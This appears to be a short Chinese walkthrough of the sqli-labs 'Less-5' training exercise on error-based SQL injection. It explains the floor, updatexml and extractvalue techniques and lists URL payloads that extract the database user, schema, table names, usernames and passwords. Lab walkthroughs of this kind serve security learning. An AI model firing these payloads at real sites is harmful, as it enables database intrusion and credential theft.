less5

 

更改id后无果，不能用union联合查询

 

 

此处用报错注入

 

报错注入的概念：
(1). 通过floor报错 and (select 1 from (select count(*),concat((
payload),floor (rand(0)*2))x from information_schema.tables group by
x)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符
(2). 通过updatexml报错 and updatexml(1, payload,1)
同样该语句对输出的字符长度也做了限制，其最长输出32位
并且该语句对payload的反悔类型也做了限制，只有在payload返回的不是xml格式才会生效

(3). 通过extractValue报错 and extractvalue(1, payload) 输出字符有长度限制，最长32位。

 

?id=1' union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

 

 

获取库名：

?id=1' union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 

 

爆表名：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+

 

 

爆用户名：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+

 

 

爆密码：

?id=1' union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+